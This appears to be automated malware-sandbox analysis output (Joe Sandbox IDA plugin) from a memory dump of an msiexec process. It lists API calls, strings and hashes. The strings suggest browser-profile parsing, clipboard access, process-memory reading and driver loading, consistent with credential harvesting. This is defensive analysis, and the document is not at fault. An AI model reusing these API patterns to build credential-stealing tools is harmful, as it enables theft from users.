                                                                                          • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                          APIs
                                                                                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                            • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                          • OpenClipboard.USER32(?), ref: 00411878
                                                                                          • GetLastError.KERNEL32 ref: 0041188D
                                                                                            • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                            • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                            • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                            • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                            • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                            • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                            • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                            • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                            • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Clipboard$FileGlobal$CloseTemp$AllocDataDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                          • String ID:
                                                                                          • API String ID: 2628231878-0
                                                                                          • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                          • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                                                          • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                          • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                          • String ID:
                                                                                          • API String ID: 1865533344-0
                                                                                          • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                          • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                          • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                          • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                          APIs
                                                                                          • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Version
                                                                                          • String ID:
                                                                                          • API String ID: 1889659487-0
                                                                                          • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                          • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                          • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                          • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                          APIs
                                                                                          • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: NtdllProc_Window
                                                                                          • String ID:
                                                                                          • API String ID: 4255912815-0
                                                                                          • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                          • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                          • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                          • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                          APIs
                                                                                          • _wcsicmp.MSVCRT ref: 004022A6
                                                                                          • _wcsicmp.MSVCRT ref: 004022D7
                                                                                          • _wcsicmp.MSVCRT ref: 00402305
                                                                                          • _wcsicmp.MSVCRT ref: 00402333
                                                                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                            • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                          • memset.MSVCRT ref: 0040265F
                                                                                          • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                          • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                          • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                          • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                          • API String ID: 577499730-1134094380
                                                                                          • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                          • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                          • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                          • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                          • String ID: :stringdata$ftp://$http://$https://
                                                                                          • API String ID: 2787044678-1921111777
                                                                                          • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                          • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                          • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                          • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                          • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                          • GetDC.USER32 ref: 004140E3
                                                                                          • wcslen.MSVCRT ref: 00414123
                                                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                          • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                          • _snwprintf.MSVCRT ref: 00414244
                                                                                          • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                          • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                          • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                          • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                          • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                          • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                          • String ID: %s:$EDIT$STATIC
                                                                                          • API String ID: 2080319088-3046471546
                                                                                          • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                          • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                          • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                          • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                          APIs
                                                                                          • EndDialog.USER32(?,?), ref: 00413221
                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                          • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                          • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                          • memset.MSVCRT ref: 00413292
                                                                                          • memset.MSVCRT ref: 004132B4
                                                                                          • memset.MSVCRT ref: 004132CD
                                                                                          • memset.MSVCRT ref: 004132E1
                                                                                          • memset.MSVCRT ref: 004132FB
                                                                                          • memset.MSVCRT ref: 00413310
                                                                                          • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                          • memset.MSVCRT ref: 004133C0
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                          • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                          • wcscpy.MSVCRT ref: 0041341F
                                                                                          • _snwprintf.MSVCRT ref: 0041348E
                                                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                          • SetFocus.USER32(00000000), ref: 004134B7
                                                                                          Strings
                                                                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                          • {Unknown}, xrefs: 004132A6
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                          • API String ID: 4111938811-1819279800
                                                                                          • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                          • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                          • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                          • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                          • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                          • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                          • EndDialog.USER32(?,?), ref: 0040135E
                                                                                          • DeleteObject.GDI32(?), ref: 0040136A
                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                          • ShowWindow.USER32(00000000), ref: 00401398
                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                          • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                          • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                          • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                          • String ID:
                                                                                          • API String ID: 829165378-0
                                                                                          • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                          • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                          • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                          • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00404172
                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                          • wcscpy.MSVCRT ref: 004041D6
                                                                                          • wcscpy.MSVCRT ref: 004041E7
                                                                                          • memset.MSVCRT ref: 00404200
                                                                                          • memset.MSVCRT ref: 00404215
                                                                                          • _snwprintf.MSVCRT ref: 0040422F
                                                                                          • wcscpy.MSVCRT ref: 00404242
                                                                                          • memset.MSVCRT ref: 0040426E
                                                                                          • memset.MSVCRT ref: 004042CD
                                                                                          • memset.MSVCRT ref: 004042E2
                                                                                          • _snwprintf.MSVCRT ref: 004042FE
                                                                                          • wcscpy.MSVCRT ref: 00404311
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                          • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                          • API String ID: 2454223109-1580313836
                                                                                          • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                          • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                          • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                          • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                          APIs
                                                                                            • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                          • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                          • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                          • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                          • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                          • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                          • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                          • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                          • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                          • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                          • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                          • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                            • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                            • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                          • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                          • API String ID: 4054529287-3175352466
                                                                                          • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                          • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                          • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                          • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                          • API String ID: 3143752011-1996832678
                                                                                          • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                          • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                          • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                          • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                          • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                          • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                          • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                          • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                          • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                          • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                          • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                          • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$HandleModule
                                                                                          • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                          • API String ID: 667068680-2887671607
                                                                                          • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                          • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                          • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                          • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                          • API String ID: 1607361635-601624466
                                                                                          • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                          • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                          • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                          • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _snwprintf$memset$wcscpy
                                                                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                          • API String ID: 2000436516-3842416460
                                                                                          • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                          • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                          • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                          • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                          APIs
                                                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                            • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                            • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                            • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                          • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                          • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                          • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                          • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                          • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                          • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                          • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                          • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                          • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                          Memory Dump Source
